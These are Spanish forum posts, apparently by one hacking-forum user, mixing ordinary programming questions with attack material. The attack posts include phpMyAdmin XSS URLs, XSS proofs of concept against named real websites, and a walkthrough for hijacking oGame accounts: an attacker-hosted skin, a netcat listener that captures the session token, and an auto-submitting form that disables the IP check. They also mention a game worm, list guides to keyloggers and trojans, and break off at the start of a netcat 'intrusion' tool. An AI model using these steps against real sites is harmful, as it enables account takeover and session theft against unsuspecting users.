Temas

Pues eso, me dispuse a entrar en http://www.appservnetwork.com para instalar apache2.2 en un netbook y bueno, el resto ya os lo imaginareis.. xd

Da pena que páginas de este tipo de proyectos sean vulnerables a SQL injection, pero mas pena me da el h4x0r que defaceo la pagina.

http://img229.imageshack.us/img229/4005/ownedmx.jpg

Buenas noches...

Hará unas semanas que creé un programa en C que tomaba capturas de la webcam (cliente) y las enviaba por internet a otro programa para su almacenamiento (servidor). El caso es que he portado el servidor a linux y mi intención es ejecutarlo en segundo plano, y esto es lo que he hecho:

Código (bash) [Seleccionar] Expandir

cp webcam /usr/sbin
cd /etc/init.d
touch wcam
chmod +x wcam

Código (bash) [Seleccionar] Expandir

#!/bin/sh
# chkconfig: 345 90 10
# description: webcamlive

# Source function library.
. /etc/rc.d/init.d/functions

prog=webcam
softbin=/usr/sbin/$prog


OPTIONS=""

# Source an auxiliary options file if we have one, and pick up OPTIONS,
#if [ -r /etc/sysconfig/$prog ]; then
# . /etc/sysconfig/$prog
#fi

RETVAL=0

start() {
echo -n $"Starting $prog: "
daemon $softbin -d $OPTIONS
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && touch /var/lock/subsys/$prog
}
stop() {
echo -n $"Stopping $prog: "
killproc $softbin
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/$prog
}

restart() {
stop
start
}

reload() {
echo -n $"Reloading $prog: "
killproc $softbin -HUP
RETVAL=$?
echo
}

# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
reload)
reload
;;
condrestart)
[ -f /var/lock/subsys/$prog ] && restart
;;
status)
status $softbin
;;
*)
echo $"Usage: $0 {start|stop|restart|condrestart|reload|status}"
exit 1
esac

exit $RETVAL

Código (bash) [Seleccionar] Expandir

chkconfig --add wcam
chconfig wcam on
service wcam start
Iniciando webcam:

El problema es que yo pensaba que ejecutaria el programa como servicio en segundo plano, y no es así, el programa se queda en "Iniciando webcam:", y funciona, pero es como si ejecutase el programa directamente desde la consola, si cierro ésta se cierra el programa.

Buenas, llevo ya un par de años sin programar en c y ahora resulta que necesito realizar un trabajo y estoy desde ayer con el mismo problema

La funcion que estoy desarrollando es sencilla en si, su misión es enviar un archivo cualquiera en forma de peticion, así un script en PHP alojado en el servidor, podrá coger el archivo.


El problema lo tengo con los null bytes, al tratarse de archivos binarios (imagenes, ejecutables, etc) estos contienen nullbytes y me cortan la cadena, como primera solución opte por leer el archivo binario poco a poco e id enviandolo por partes, pero el problema, es que send, por lo que estoy observando, realiza tantas peticiones como envios se hagan, entonces, si corto el header para enviar luego el archivo, el servidor no entendera ninguna peticion, ya que estaran todas incompletas.


¿Alguna solucion/alternativa?

Código (c) [Seleccionar] Expandir

"POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Type: multipart/form-data; boundary=---------------------------%s\r\n"
"Content-Length: %i\r\n\r\n"
"-----------------------------%s\r\n"
"Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n"
"Content-Type: %s\r\n\r\n"
"%s"
"\r\n-----------------------------%s\r\n"


Gracias y saludos!

El principal motivo por el cual no se está permitido abrir un tema en este subforo es por la calidad del mismo y por otra parte, por el tema de la organización, así pues, el procedimiento a seguir para publicar un tema es el siguiente:

1. Publica el tema en el subforo correspondiente.
2. Enviar un mensaje privado al moderador de este subforo (yeikos), estableciendo Documentación como asunto y la dirección del tema como mensaje.
3. Esperar un breve espacio de tiempo, se os enviará un mensaje privado cuando vuestro tema original se haya movido al subforo Tutoriales - Documentación.

[[Documentación]]

   [Documentación]

     + Software
        - Utilización de Flash MX - (gigasize)
        - Tutoriales de Flash MX - (gigasize)
        - Manual Dreamweaver - (gigasize)
        - Utilización de Dreamweaver MX - (gigasize)
        - Utilización del FreeHand - (gigasize)
        - Utilización de Fireworks MX
        - Macromedia Flash MX ActionScript
        - Adobe photoshop
        - Adobe Photoshop 7
        - Ojo dijital photoshop
        - Manual Word, Excel, Acces y Power Point
        - Excel 2002 Formulas
        - Manual de Open Office Calc
        - Manual de Open Office Draw
        - Manual de Open Office Impress
        - Manual de Open Office Math
        - Manual Window Movie Maker
        - [Manuales] Tutorial Excel
        - [Manuales] Tutorial Word
        - Curso.Int. Office.XP
        - Trucos Windows XP
        - Curso Oficial de Windows server 2003 Esp
        - Curso Oficial de Windows server 2003 Esp2
        - Como comprimir un video Divx a CVCD
        - Sistema de correo con postfix
        - Tutorial Tune Up Utilities
        - Curso de autocad
        - Total HTML Converter

     + Programación
        - Curso de Programacion
        - Curso de ensamblador
        - Curso de HTML
        - Curso de iniciación al lenguaje C
        - Curso de introducción a C++
        - Curso de Java Script
        - Curso de Pascal
        - Curso dos
        - Tutorial c++
        - gcc inline assembly how to.pdf
        - Guía de programación de módulos
        - Interfaz programación controlado
        - Manual HTML desarrollo web
        - HTML para crear páginas Webs
        - Curso de programacion html-ook.doc
        - Curso completo de html
        - Manual XML programación con muestras gratis
        - Programación Visual Basic ilustrado
        - Curso de Visual Basic 6
        - Java desde cero
        - Programación Linux
        - Creación de un keygen
      
     + Seguridad
        - Curso Seguridad en Windows XP - (gigasize)
        - Guía seguridad Linux
        - Seguridad en UNIX y redes
        - Seguridad física
        - Seguridad Wireless
        - Seguridad en TCP-IP 1
        - Vocabulario sobre criptografía
        - Curso de seguridad informática y criptografía
        - Criptografia simétrica
        - Criptografia asimetrica
        - Funciones hash
      
     + Redes
        - Técnico en Redes Informáticas
        - Técnico Superior en Redes Informáticas
        - Técnico en Redes Informa
        - Curso de Wireless
        - Curso de Wireless avanza
        - Experiencias-Instalando-Red..pdf
        - Guía de administración de redes con Linux
        - Guía de administración de redes con Linux (más nuevo que el anterior)
        - Redes
        - Guia didáctica ethernet 1
        - Guia didáctica ethernet 2
        - Guia didáctica ethernet 3
        - Redes inalámbricas 4
        - Redes inalambricas 5
      
     + Internet
        - Curso de FTP
        - Curso de Internet
        - Curso de IP
        - Curso de IRC
      
     + Linux
        - Dentro del núcleo de Linux 2.4
        - Manual Linux controladores
        - Fundamentos de Unix e Internet
        - Guía de Linux para el usuario
        - Guía del procfs del nucleo Linux
        - Guía no oficial de ubuntu.pdf
        - Guía rápida de newnat
        - Instalación de Linux
        - Instalación de Suse Linux
        - Instalación Debian 3.0
        - Instalación sistema Debian
        - Instalación y configuracion de un cluster de alta disponibilidad bajo Linux
        - Interconexion-IRDA con Linux
        - Iptables manual practico.pdf
        - Metodologia para el desarrollo de aplicaciones en Linux
      
     + Hardware
        - Técnico en Hardware
        - Reparación de PCs - (gigasize)
        - Montar un PC - (gigasize)
        - Montar cibercafé parte 1 - (gigasize)
        - Montar cibercafé parte 2 - (gigasize)
        - Reparación de monitores de PC
        - Reparación de PC módulo 1
        - Reparación disco duro
        - Manual de mantenimiento y reparación de unidades

     + Electricidad, electrónica y mecánica
        - Fuente de videograbadoras Panasonic
        - Ajuste de la tensión de cinta en videograbadoras
        - Reparación de móviles y liberación de PSX
        - Curso de mecánica y electricidad de automóvil
        - Cassette para prueba de mecanismos VHS
        - Sistema de transporte de cinta - (gigasize)
        - Sintonizador para pruebas de TV y videograbadoras - (gigasize)
        - Philips no arranca
        - osciloscoppio en el ordenador - (gigasize)
      
     + Recopilaciones
        - Recopilacion de manuales
        - Documentación www.elhacker.net
        - Manuales, textos, tutoriales y documentación 1
        - Manuales, textos, tutoriales y documentación 2
        - Libros digitales 1
        - Libros digitales 2
        - Libros digitales 3

     + Otros
        - Curso de FAQS
        - Guia completa de Medal of Honor Pacific Assault
        - Acceso directo a manuales de procedimientos de enfermería
        - Ley de Murphy

   
      Fuente original: turion
   
   

[[XSS]]

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
single_table=true

Fuente original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html

[[Software]]

[Software]

+ Servidores Web/Correo
- Apache+SSL+cURL+PHP5+MySQL+OracleXE+Webmin+SSH+VNC+phpMyAdmin en Debian Etch por Ing_Amc
- Instalar Apache + PHP + MySQL + Perl en Windows y Linux + Configuración Avanzada por el-brujo
- Instalación de Apache + PHP + MySQL en Windows por Crackptus^^
- Manual de Instalación del AppServ 1.7 por theskull
- [Manual] Instalacion Servidor Appserv 2.x.x por Ruiz
- Tutorial [Montar Servidor Casero] por SeniorX
- Montar servidor casero sobre Windows: I. Configuración de DNS por el-brujo
- Montar servidor casero sobre Windows: II. Servicio WEB por el-brujo
- Montar servidor casero sobre Windows: III. Servicio de correo. por el-brujo
- Instalando un servidor web en tu pc con windows 2000 por Azielito
- IIS 5.0, el servidor web standard de windows por Rojodos
- Tutorial XMailServer (Servidor de Correo) por el-brujo

+ Servidores FTP
- manual muy básico para montar un servidor ftp. por Badcode
- Servidor FTP para Linux --> ProFTPD por el-brujo

+ Clientes FTP/Correo
- Manual Cute FTP ñ_ñ por AciDarK
- Correo Hotmail en tu Outlook Express por el-brujo
- Como configurar Outlook??? por komkal
- Introducción a Thunderbird por ANELKAOS

+ Máquinas virtuales
- Escrito sobre VMWare. por NemeSys
- Manual: Creando una Máquina Virtual por Stone_FREE_
- [Manual] Instalar una máquina virtual sobre Qemu en Windows por Kasswed

+ Seguridad
- .::Instalacion de A-adware 6.0 Profesional::. por Crackptus^^
- tutorial zone alarm por bAd bItE 32
- Aprendiendo a configurar Kasperky Anti-hacker por TaN€R
- MANUAL PARA ACTUALIZAR NOD32 v3 sin INTERNET por KATRUFIAN
- Excluir carpetas (con troyanos, virus, etc) de los AV |By-Skull| por skullmaster123

+ Linux
- Mi pequeño manual de instalación de gentoo ( por g0su ) por ..sR. aDiKtO..
- INSTALE Red Hat Enterprise Server 4 centos VIDEOTUTORIAL por TaN€R

+ Otros
- Videotutoriales varios por maxwellnewage
- Todo en uno sobre P2P : programas, parches, manuales y seguridad por wolfbcn
- Manual de Acronis Universal Restore (Clonación entre PCs con diferente hardware) por Bijomaru
- Manual de Acronis Universal Restore (Clonacion entre PCs con diferente hardware) por Bijomaru
- Conversion-ripeo PBP.BIN.IMG.ISO.DAX.PPF...BLA.BLA por drk_4334
- Videotutorial real vnc por N@5h
- Cómo crear una red P2P para los amigos por wolfbcn
- Mini tutorial nLite, instalador desatendido Windows XP por lo_jorge
- Mandar fax desde office 2007 sin tener un Fax por gordy
- ...........Si tienes internet...tienes llamadas gratis a 35 Paises..."voipstunt" por vicente101
- Informacion de Eggdrop por Ruiz
- Instalación eggdrop1.6.x! Bots para IRC por ip
- [Tutorial] Escuchar musica y ver videoclips gratis con el Winamp por Mancebo
- Tutorial montar una emisora online con Winamp por Songoku
- [Manual] Autoplay Media Studio por Kasswed
- Tutorial CD Control Copy por Ubetor^^
- Tutorial del OnlineSig para eMule ( y sus mods) por Bres
- VideoTutorial particionar con Partition Magic 8.0 por ¤ Nerviozzo ¤
- Analisis del John The ripper... por cuántico
- Manual Mdcrack-PARA MI el mejor crackeador de MD5- por chiflon
- Discusion about JaSiLDBG - ‫ ‫ ‫javascript inLine Debugger por Sirdarckcat
- INTRODUCCION A ACTIVE DIRECTORY por soplo
- [Manual] The Gimp por Kasswed
- Tutorial Poser 6 por pisagatos
- Cómo hacer un Live-CD... por BADBYTE-K
- How to: Instalar MacOSx86 10.4.5 sobre VmWare 5.5.1 en Windows por Ing_Amc
- Discusión de JaSiLDBG - ‫ ‫ ‫javascript InLine Debugger Sirdarckcat
- Soft Admins y Webmasters por el-brujo
- Crear circuito cerrado con webcam y VPN Hamachi por Martín Fierro

[Programación]

+ Programación Web
- Ultimate HTML Reference (.pdf 545 pjs) por isseu
- Aprender HTML completo, a un par de horas de distancia por Creature
- guia html desde 0 por sorcerer
- [Tutorial para Novatos] COMO CREAR UNA PáGINA WEB por JaMeS-aT (VIP)
- Aprendiendo Php con los mejores :d por TaN€R
- Tutorial, uso de php con las bases de datos... por Rey11
- [video tutorial] PHP & MySQL por bano
- Curso ASP por el-brujo
- [:: Tutorial ::] Manual ASP por -Riven-Ward-
- XML: Extensible Markup Language. por GutBarr -ZP-

+ Sistemas prefabricados PHP
- Hacer tu Propio Theme de PHP-Nuke por [P]UnKeRmA[N]
- Phpbb [Mod] De Noticias por 4D1cTo
- .::[TUTORIAL]::. que ES EL PHPNUKE Y COMO SE INSTALA por skamilo
- [Tutorial] Instalación de un servidor local [joomla, phpBB, wordpress, SMF] porUnknownmind

+ Programación general
- Libros sobre Programación - Descarga Directa por jconcurrent
- Libros de Java por iAssassin
- H-ZINE ROOT SYSTEM Primera edición por darki113r
- TUTORIAL PROGRAMACION BAT por soplo
- How-To: Crear Extensiones para Firefox. por Crack_X
- Crea tu propia extensión para Firefox [programación en XUL] por Casidiablo
- introduccion a la creacion de extensiones para el firefox por vacio
- Tip's. por s0cratex

+ mIRC
- Manual de scripting leanlo es para el irc (primera parte) por Network-Systems
- Manual de scripting (segunda parte) por Network-Systems
- ..::Comandos Irc Hispano::.. por AciDarK

[Hacking]

+ Programas
- Nikto scanner de vulnerabilidades de servidores web por R41N-W4R3
- manual del perfect keylogger 1.5 indetectable a norton... por Badcode
- teclasss.exe_by_bano por bano
- Manual De Como Hacer Un Archivo Auto Ejecutable Con Winrar Por Mr. BlOodY por ¤ Nerviozzo ¤
- Curso de Assa*sin* 1 por dargo
- Introducción a Essential Net tools por TaN€R
- TUTORIAL DE NETCAT PÀRA NEWBIES por hierosgammos
- El Netcat. La navaja suiza de los hackers y administradores ;) por Rojodos
- Manual de NetCat por Kasswed
- Ocultando el Tray Icon del No-IP DUC por _R€d_
- Curso completo de Troyanos por .ANTRAX.
- Manual-Todo sobre los Troyanos por BenRu

+ Microsoft Windows
- Contraseñas en Windows XP [Documento] por -| Sir_Lance |-
- Robo y Crackeo del archivo SAM en Win NT/2000/XP por Rojodos
- Contraseñas admin en Windows XP/NT por codebreak
- Crackear 9x/NT/2000/XP por PeRXD
- Como Entrar A Una Maquina Windows Con Recursos Compartidos por Black And Hack
- Intrusion sistemas por NETBIOS, by Zero Byte por Rojodos
- Extenso manual sobre NetBIOS + Programa por ||MadAntrax||
- Ocultando Troyanos en carpetas (Win98) por DesTruçToR
- Ocultación de troyanos por el-brujo
- Instalacion del NT Rootkit 0.40 en Sistemas basado en NT por Xatyro
- DEEP FREEZE por jacks_du
- Hackear el Server con redes NT por WHK
- 1 -Hacking Windows 9x por el-brujo
- Hack desde windows 95 por

+ Linux
- Networking over Linux por averno
- Sniffers en Sistemas Linux... por bAd bItE 32
- Seguridad en Linux por el-brujo
- Security-Enhanced Linux (SELinux) por BASIC CAOS
- ¿Cómo puedo saber si un sistema Linux ha sido comprometido? por Rojodos
- Seguridad en Linux Mandriva por el-brujo

+ Páginas Web
- Seguridad en los foros (o falta de ella) por E0N
- introducirse en pagina web por entelequio
- Como hackear páginas web por mrfakerdark
- [::Tutorial::] - Ataques XSS por Rentero
- Los Poderes Secretos de XSS (Cross Site Scripting) por Sirdarckcat
- XSS FINAL-Version TXT por s0cratex
- Saltándose los filtros ‫ ‫ ‫javascript El ataque Flash! por FeRmO
- Html inyection por Rey11
- Tutorial de Inyección SQL (SQL Injection) por Sirdarckcat
- Remote File Inclusion para NOVATOS por Necro
- Local/Remote File Inclusion por Lympex
- Acceso a webs ASP restringidas por el-brujo
- El bug del UNICODE por el-brujo
- Documentacion: Unicode, Decode, ISAPI y WebDav (ntdll.dll overflow) por Rojodos
- como hacer un error 404 php por bAd bItE 32
- Cómo explotar remota y automáticamente un error de formato por Xatyro
- Mini manual para hackear una web hecha en php-nuke por keyhole
- PHP-Nuke SQL Inyection Module News!Exploit! por Kriptosys
- Manual ¿Como Compilar un Exploit en Php? Con Bamcompile By OzX por OzX

+ Seguridad
- Cold Boot Attack pdf+video por pepito pepon
- Manual de seguridad by ROBOKOP. por Robokop
- Conferencia sobre Seguridad por Death Master por Rojodos
- White Paper <Internet Security> por HaCkZaTaN
- Tutorial sobre el spyware por Mordor
- Taller de Criptografía por Death Master por Unravel
- Manual de procesos que se ejecutan al inicio de Windows XP por nhaalclkiemr
- Configuración de Internet Explorer por silverhack
- HijackThis [... y que les peten a los hijackers del explorer !] por bano
- Intentando detener un DDoS por el-brujo
- Configurando Servidores DNS seguros por el-brujo

+ Documentación
- Curso de Hacking y Seguridad Informatica por templar
- Hacking Basico!! por HaCkZaTaN
- Un tutorial de hacking para novatos por drahken
- Tutorial Basico Del Hacker Defender 1.0.0 por h4z3
- FAQ de es.comp.hackers! Imprescindible!!! por Rojodos
- entrar (interesante) por Dr.DooM
- Tutorial enviar e-mails anonimos por Songoku

[Documentación]

+ Hosting/Web/Flash
- vIDEOTUTO Registro Y OBtención de HOSTING INglés por TaN€R
- TU PAGINA WEB GRATUITA SIN PUBLICIDAD Free Hosting por JaMeS_aT (VIP)
- ENTIENDE EL FUNCIONAMIENTO DE LA WEB (para inciarse) DarK_FirefoX
- VIDEOTUTORIAL Perdiendo el miedo a FLASH MX por TaN€R
- Videotutorial Perdiendo el miedo a FLASH MX III por TaN€R
- 1er Tutorial de Flash & ActionScript por MakiaResc
- Manual subir archivos (servidor microsoft) por hadrianweb
- Manual subir fotos con Picasa Nuevo por hadrianweb

+ Redes
- Curso de Wifi por Banker25
- Curso De Certificacion SATRA. Redes por supremuz
- Historia de los protocolo. Protocolo OSI y TCP en capas por mundo
- Explicación del modelo OSI por oscarosalazar
- Arquitectura TCP/IP... Excelente texto!!!! por Rojodos
- Links Sobre TCP/IP por templar
- tcp/ip por x254
- ipv6 e internet2 por D3C0D3R
- Análisis Remoto de Sistemas por Honoriak por soplo

+ Microsoft Windows
- Biblia de Trucos Windows Xp e Internet por Madestro
- Cursos Microsoft Gratis por Makiaveluz
- Uso de comodines en ms-dos por komkal
- Comandos NET principales en Windows por soplo
- Resumen Curso Telnet/Shell por Infohackers.org por el-brujo
- Basico sobre Telnet por Capis
- Regedit.exe por BASIC CAOS
- NETSTAT Y SUS FUNCIONES por prodigio
- Manejo de las conexiones de red en Windows por YaTaMaS
- Consultar Correo (pop3)Por Telnet AciDarK
- Como pasar Windows 2003 Evaluation a Enterprise edition. por Darkcam
- Copiar datos de un perfil de usuario dañado a un perfil nuevo por 1001

+ Linux/UNIX
- Implementación de Servidores: Linux por KarlosVid(ÊÇ)
- Libros de Linux por iAssassin
- Fundamentos de Unix v2.0 Español (CISCO) por Madestro
- Log de la 1ra charla sobre introducción a GNU/Linux por cuántico
- Documentación, seguridad en linux, programación y + por ANELKAOS
- Curso Shell por el-brujo
- todos los tips que sepan :D por ip
- Las respuestas a tus problemas por ip
- MANUAL: Acceso a la red con telnet, ftp y los comando r- por mundo
- [ IPtables ] Introducción por Soul Lost
- Compilación del kernel paso a paso por ip
- Compilacion de Linux Kernel por ..sR. aDiKtO..
- ¿Qué podemos hacer con un PC antiguo? Linux puede servirte de mucho por wolfbcn

+ Google
- Guia de Google por templar
- Robots, arañas de buscadores por Azielito
- Brincar algunos sitios privados asíéndonos pasar por Googlebot por YaTaMaS
- Gmail y POP3 por keyhole
- Trucos de Gmail por el-brujo
- Descargar música con Google, como si se tratate de un p2p por YaTaMaS

+ Otros
- Libros técnicos. por j.rm
- [iso] todo lo que queria saber por skazo1980
- [Documentación] 61 Manuales, tutoriales, guías, cursos, etcétera por yeikos
- necesito ingles sin barreras en pdf o word por LUI3422
- Manuales elhacker.net y Premium Gigasize por germandc
- Manuales Informatica por HaCkeR-BoY
- Traducción de manuales, proyectos, etc... por Carloswaldo
- Coleccion de Manuales En Español...Descarga Directa! por mousehack
- e-books gratis por ANELKAOS
- Comparativa entre Servidores de Correo por el-brujo
- Redactar Correos Efectivos por DarK_FirefoX
- [Manual] Ver todos los partidos del mundo gratis. Kasswed
- Tutorial para descargar videos de YouTube manualmenteGrave
- Sacar videos de youtube manualmente para ponerlos en forosdimitrix1
- ¿Donde se guardan los "emoticonos" del MSN Messenger? por Mancebo
- Tutorial msn 7.0 por websmaster
- COmo puedes tener internet en tu celular sony ericsson...?facil por MasterGiga
- Tutorial como Instalar Proxie en Firefox y Internet Explorer por templar
- Lista de Extensiones por The Ghost
- TUTORIAL RSS por NeoCalderon
- Datos sobre y con relacion a las T. de Video por Ruiz
- GUÍA:Subir al máximo tu Hz de tu monitor (REFRESCO) por Ruiz
- Manual Creación de VideojuegosIsirius
- Grabar juegos de play1,que tienen proteccion por TaN€R
- Como grabar archivos descargados por websmaster
- ¿Cómo funciona el proceso de recuperar datos? por wolfbcn
- Pegar, insertar, incrustar y vincular por wolfbcn
- Panel de Control Plesk (en muchos hostings lo dan) por el-brujo
- Revistas de hackxcrack por exon
- Prácticas del foro de hacxcrack por el-brujo
- Formatear Particion NTFS por cuántico
- ¿Que es un disquete de arranque? por prodigio
- ***************P2m**************** por electro-ooz
- Huevos de pascua HP 49G+ ANELKAOS
- Acceso a contenido privado del Space Telescope Science Institute por ANELKAOS
- BIOS por jbex
- Computación.... por neo_hacker
- Videotutorial: interpolación de movimiento básica. por .:wvb:.
- ..:Tutorial:.. Como traducir un programa por ¤ Nerviozzo ¤
- Crackme Splish [Nivel Newbie]. por Paisterist
- BASE 64 cokeing
- Consejos caseros para combatir el cada vez más común y molesto 'spam' telefónico por wolfbcn

[Hardware]

+ Redes
- CCNA 1-2-3-4 en PDF por NaNo N´RoSeS
- F.A.Q Routers con ADSL por bano
- Pasos detallados para clonar un Cablemodem por mexicano_15
- Buen manual para uncappear un cablemodem Motorola por mexicano_15
- Manual Uncapping aportado por "hello!" por Ubetor^^
- Pasos para cambiar el serial del cablemodem por - DarkLinux -
- Academia de Networking de Cisco por Xatyro
- Curso Completo De CERTIFICACION "Cisco" por supremuz
- material de cisco ccna1 por the_shark
- Cisco y demás por zeta007

+ General
- Serie Reparación y Mantenimiento de Teléfonos Celulares (6 CDs) por mkdatos
- Todo Sobre la Pc por templar
- REPARE Y CONOZCA SU PC (CURSO) por TaN€R
- Mantenimiento preventivo y correctivo para PCs por Crackptus^^
- QUe es un disco duro por Matrix
- Overclocking, sistemas de refrigeración y más por el-brujo

Buenas, hace tan solo unos minutos he publicado un gusano programado en PHP para oGame, si os interesa el asunto podéis pasaros por el tema... 

Editado: Al parecer el tema se encuentra en el LAB por seguridad, habrá que esperar...

Lo único que he encontrado de interés en google sobre como programar con raw socket en VB es esto .

Lo he probado, habiendo colocado previamente la libreria en system32, y según dice en los comentarios cuando te devuelve 0 quiere decir que se ha realizado la operación exito, en cambio a mi siempre me devuelve el valor 40.

A ver si alguien lo prueba y le funciona, o si sabe programar raw socket como que mejor, saludos  .

[XSS Injection]

Estaba programando PHP y al abrir el navegador k-meleon y se me ocurrió una idea... ¿y si inyectamos código HTML en el UserAnget? o mejor aún... ¿y si hacemos SQL Injection?

XSS Injection

Código [Seleccionar] Expandir

<?php
echo $HTTP_USER_AGENT
?>


SQL Inyection

Código [Seleccionar] Expandir

<?php
echo "<a href='".$_SERVER['PHPSELF']."?act=1'>Registrarse</a> |
<a href='".$_SERVER['PHPSELF']."'>Listado</a><br><br>";

$act = $_GET['act'];

if ($act == 1) {
$IP=getenv("REMOTE_ADDR");
echo $HTTP_USER_AGENT;
mysql_query("Insert into browsers (UserAgent, IP) values ('$HTTP_USER_AGENT', '$IP'), $link");
} else {
echo "Listado";
$result=mysql_query("select * from browsers where UserAgent = '".$HTTP_USER_AGENT."'",$link);  
while($row = mysql_fetch_array($result)) { 
echo "Tu UserAgent fue registrado con la siguiente IP: ".$row['IP']."<br>";
}
}

?>


Ejemplo práctico en http://id.ziew.info.

No se si ya se ha hablado de esto anteriormente, a mi se me ocurrió de repente, aunque supongo que a mucha gente también...

PD: Para evitar estas inyecciones usen htmlspecialchars.

[Cross Site Scripting (XSS)]

Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...

Código [Seleccionar] Expandir


<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>

Código [Seleccionar] Expandir


http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear

Código [Seleccionar] Expandir


http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>


He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

Código [Seleccionar] Expandir

<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>

Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

Código [Seleccionar] Expandir

<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>

Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces! 

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.

Código [Seleccionar] Expandir


<?php

// A partir de esto quiero formar la variable $var1 para operar más tarde con ella
$var;
$num = "1";

echo $var1;

?>

Se que se puede por que en una ocasion me respondieron a esta misma duda en el IRC, pero la olvidé... A ver si alguien tiene la respuesta, saludos!

Alguien sabe de donde puedo sacar el cursor ese que aparece al pasar el puntero por encima de un enlace? no lo encuentro por ninguna parte, y en el VB no está.

He buscado la opcion de bloquear la barra de tareas en el registro pero no la encuentro, también he buscado alguna api para saber si está bloqueada o no, pero a lo máximo que he llegado ha sido a
RunDll32.exe shell32.dll,Options_RunDLL 1

Saludos

Cuando compilo esto y lo ejecuto no me muestra el codigo fuente entero, sino que se corta por el caracter 3000 y algo, y no solo en esa pagina, si no en muchas más que tienen el código fuente largo,   porque puede ser? alguna solución?

Código [Seleccionar] Expandir


code = Inet.OpenUrl "http://www.hl2spain.com"
text1.text = code


Este es el código

Código [Seleccionar] Expandir


Declare Function mciExecute Lib "winmm.dll" (ByVal lpstrCommand As String) As Long
Private Sub Form_Load()
iResult = mciExecute("Play c:\carpeta 1\setup0.wav")
End Sub


El problema es que no reconoce la ruta porque encuentra un espacio, alguna solucion para arreglarlo? u otra manera de reproducir archivos wav?

1º Descargamos el NetCat y lo guardamos en "C:\nc.exe".

INC.bas

Código [Seleccionar] Expandir


' Intrusion NetCat by YeIk0s
' No me responsabilizo de los malos usos que se le de a este código

Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
